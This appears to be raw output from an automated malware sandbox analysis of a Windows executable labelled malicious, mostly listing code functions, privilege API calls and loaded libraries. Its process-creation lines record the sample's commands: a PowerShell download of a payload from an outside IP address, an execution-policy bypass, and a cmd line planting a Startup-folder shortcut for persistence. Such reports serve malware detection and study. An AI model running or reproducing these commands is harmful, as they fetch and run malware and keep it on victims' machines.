Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64392BE701_2_00007FF64392BE70
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64394BEB41_2_00007FF64394BEB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD33EA3C258_2_00007FFD33EA3C25
Source: C:\Users\Public\Guard.exeCode function: 11_2_000FB02011_2_000FB020
Source: C:\Users\Public\Guard.exeCode function: 11_2_000F94E011_2_000F94E0
Source: C:\Users\Public\Guard.exeCode function: 11_2_000F9C8011_2_000F9C80
Source: C:\Users\Public\Guard.exeCode function: 11_2_001123F511_2_001123F5
Source: C:\Users\Public\Guard.exeCode function: 11_2_0017840011_2_00178400
Source: C:\Users\Public\Guard.exeCode function: 11_2_0012650211_2_00126502
Source: C:\Users\Public\Guard.exeCode function: 11_2_0012265E11_2_0012265E
Source: C:\Users\Public\Guard.exeCode function: 11_2_000FE6F011_2_000FE6F0
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011282A11_2_0011282A
Source: C:\Users\Public\Guard.exeCode function: 11_2_001289BF11_2_001289BF
Source: C:\Users\Public\Guard.exeCode function: 11_2_00170A3A11_2_00170A3A
Source: C:\Users\Public\Guard.exeCode function: 11_2_00126A7411_2_00126A74
Source: C:\Users\Public\Guard.exeCode function: 11_2_00100BE011_2_00100BE0
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011CD5111_2_0011CD51
Source: C:\Users\Public\Guard.exeCode function: 11_2_0014EDB211_2_0014EDB2
Source: C:\Users\Public\Guard.exeCode function: 11_2_00158E4411_2_00158E44
Source: C:\Users\Public\Guard.exeCode function: 11_2_00170EB711_2_00170EB7
Source: C:\Users\Public\Guard.exeCode function: 11_2_00126FE611_2_00126FE6
Source: C:\Users\Public\Guard.exeCode function: 11_2_001133B711_2_001133B7
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011F40911_2_0011F409
Source: C:\Users\Public\Guard.exeCode function: 11_2_0010D45D11_2_0010D45D
Source: C:\Users\Public\Guard.exeCode function: 11_2_0010F62811_2_0010F628
Source: C:\Users\Public\Guard.exeCode function: 11_2_000F166311_2_000F1663
Source: C:\Users\Public\Guard.exeCode function: 11_2_001116B411_2_001116B4
Source: C:\Users\Public\Guard.exeCode function: 11_2_000FF6A011_2_000FF6A0
Source: C:\Users\Public\Guard.exeCode function: 11_2_001178C311_2_001178C3
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011DBA511_2_0011DBA5
Source: C:\Users\Public\Guard.exeCode function: 11_2_00111BA811_2_00111BA8
Source: C:\Users\Public\Guard.exeCode function: 11_2_00129CE511_2_00129CE5
Source: C:\Users\Public\Guard.exeCode function: 11_2_0010DD2811_2_0010DD28
Source: C:\Users\Public\Guard.exeCode function: 11_2_0011BFD611_2_0011BFD6
Source: C:\Users\Public\Guard.exeCode function: 11_2_00111FC011_2_00111FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BEB02017_2_00BEB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BE94E017_2_00BE94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BE9C8017_2_00BE9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C023F517_2_00C023F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C6840017_2_00C68400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C1650217_2_00C16502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BEE6F017_2_00BEE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C1265E17_2_00C1265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0282A17_2_00C0282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C189BF17_2_00C189BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C16A7417_2_00C16A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C60A3A17_2_00C60A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BF0BE017_2_00BF0BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C3EDB217_2_00C3EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0CD5117_2_00C0CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C60EB717_2_00C60EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C48E4417_2_00C48E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C16FE617_2_00C16FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C033B717_2_00C033B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0F40917_2_00C0F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFD45D17_2_00BFD45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BEF6A017_2_00BEF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C016B417_2_00C016B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFF62817_2_00BFF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BE166317_2_00BE1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C078C317_2_00C078C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0DBA517_2_00C0DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C01BA817_2_00C01BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C19CE517_2_00C19CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00BFDD2817_2_00BFDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C01FC017_2_00C01FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C0BFD617_2_00C0BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: String function: 00007FF643948D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00101A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00110D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00118B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00BF1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00C00D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00C08B30 appears 42 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@16/16@2/2
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A3778 GetLastError,FormatMessageW,1_2_00007FF6439A3778
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398CCE0 AdjustTokenPrivileges,CloseHandle,1_2_00007FF64398CCE0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64398D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00007FF64398D5CC
Source: C:\Users\Public\Guard.exeCode function: 11_2_00148DE9 AdjustTokenPrivileges,CloseHandle,11_2_00148DE9
Source: C:\Users\Public\Guard.exeCode function: 11_2_00149399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00149399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C38DE9 AdjustTokenPrivileges,CloseHandle,17_2_00C38DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C39399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00C39399
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00007FF6439A58C4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439BEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_00007FF6439BEB34
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A83D4 CoInitialize,SHGetSpecialFolderLocation,SHGetDesktopFolder,CoCreateInstance,SHCreateShellItem,CoTaskMemFree,SHBrowseForFolderW,SHGetPathFromIDListW,CoTaskMemFree,CoTaskMemFree,CoUninitialize,1_2_00007FF6439A83D4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643926580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00007FF643926580
Source: C:\Users\user\Desktop\PPbimZI4LV.exeFile created: C:\Users\Public\PublicProfile.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewvubiqc.iw0.ps1Jump to behavior
Source: PPbimZI4LV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PPbimZI4LV.exeVirustotal: Detection: 27%
Source: PPbimZI4LV.exeReversingLabs: Detection: 42%
Source: unknownProcess created: C:\Users\user\Desktop\PPbimZI4LV.exe "C:\Users\user\Desktop\PPbimZI4LV.exe"
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dllJump to behavior
